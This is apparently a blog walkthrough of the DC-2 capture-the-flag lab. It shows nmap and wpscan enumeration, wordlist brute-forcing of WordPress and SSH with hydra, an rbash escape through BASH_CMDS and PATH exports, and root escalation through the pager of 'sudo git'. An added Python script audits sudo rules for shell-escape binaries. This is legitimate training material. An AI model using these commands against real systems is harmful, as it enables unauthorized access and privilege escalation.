Detailed walkthrough of penetrating the DC-2 target machine (target machine link attached)

DC-2 target machine download link: https://pan.baidu.com/s/1g8nEs5K0MYBCfQr-bGla-w
Extraction code: 3xt9

View the Kali host IP: ifconfig
View the MAC address of the target machine: open the virtual machine settings, click the network adapter, select NAT mode, and click Advanced.
Use nmap to scan for the target IP: nmap -sP 192.168.159.0/24
Compare the MAC addresses; the target machine's IP is 192.168.159.139.
Use nmap to scan the ports: nmap -A 192.168.159.139 -p 1-65535
Port 80 is open. Open a browser and enter the IP to access the page; the page cannot be loaded. Add a local DNS entry:
open /etc/hosts with vim /etc/hosts and add the line 192.168.159.139 DC-2

Try to access the page again; this time it loads.
flag1 is found. The hint in the flag says to use the cewl tool.
Scan the website directories with the dirsearch tool (the tool has to be downloaded separately: https://github.com/maurosoria/dirsearch). Go to the dirsearch directory and run:
python3 dirsearch.py -u 192.168.159.139 -e*

The site turns out to be built on WordPress. Use wpscan to scan it:
wpscan --url dc-2 -eu
Three users are found.
Create a user dictionary: vim user.dic

Use the cewl tool to generate a password dictionary: cewl dc-2>pwd.dic
Brute-force the users with wpscan: wpscan --url dc-2 -U user.dic -P pwd.dic
The dirsearch scan results show that /wp-admin exists. Accessing it shows that it is the login page.
Log in as the jerry user with the password we brute-forced. flag2 is found,
and it tells us to find another way. We thought of the nmap scan, which found SSH on port 7744.
Use hydra to brute-force SSH:
hydra -L user.dic -P pwd.dic ssh://192.168.159.139 -s 7744 -vV
The brute force succeeds.
Try to log in with ssh: ssh [email protected] -p 7744
Login succeeds.
List the files in the current directory: ls
flag3 is found.
View flag3: cat flag3.txt
The command is blocked by the restricted shell (-rbash).
Bypass the restriction:
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
flag3.txt is read successfully.
Switch to the jerry user: su jerry
Enter the password; the switch succeeds.
Enter jerry's home directory and find flag4.
View flag4: cat flag4.txt
List the commands that can be run with root privileges: sudo -l
The git command can be run as root, and no password has to be provided.
Escalate privileges with git: sudo git -p --help
This forces git into the interactive pager, because the page buffer cannot display all the information at once. In the pager, enter: !/bin/bash
Then find the final flag.
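
A defender's check for the sudo misconfiguration used in the last step, as an added example that is not part of the original post: it parses `sudo -l` output and flags rules that allow a program with a built-in shell escape (such as git's pager) to run as root. The sample output, its paths and extra rules, and the list of binaries are constructed assumptions.

```python
import os
import re

# Programs that can start a shell from inside themselves (pager "!" escape,
# editor ":!" command, interpreters). Assumed, non-exhaustive list.
SHELL_ESCAPE_BINARIES = {
    "git", "less", "more", "man", "vi", "vim", "find", "awk",
    "python", "python3", "perl", "ruby", "env", "bash", "sh",
}

# Constructed sample of `sudo -l` output (paths and extra rules are made up).
SAMPLE_SUDO_L = """\
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) /usr/bin/less /var/log/syslog
    (root) /usr/sbin/service apache2 restart
"""

# "(runas) TAG: TAG: command, command" as printed by `sudo -l`.
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_l(text):
    """Return a finding for every allowed command that can escape to a shell."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        users = m.group("runas").split(":")[0].split(",")
        as_root = any(u.strip() in ("root", "ALL") for u in users)
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",") if c.strip()):
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL" or binary in SHELL_ESCAPE_BINARIES:
                severity = "high" if as_root and nopasswd else "medium"
                findings.append({"command": cmd, "nopasswd": nopasswd,
                                 "as_root": as_root, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{f['severity']:6} {f['command']} (NOPASSWD={f['nopasswd']})")
```

Rules it flags should be removed or replaced with a narrow wrapper that cannot reach a pager, editor or interpreter.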

Origin blog.csdn.net/bwt_D/article/details/118068407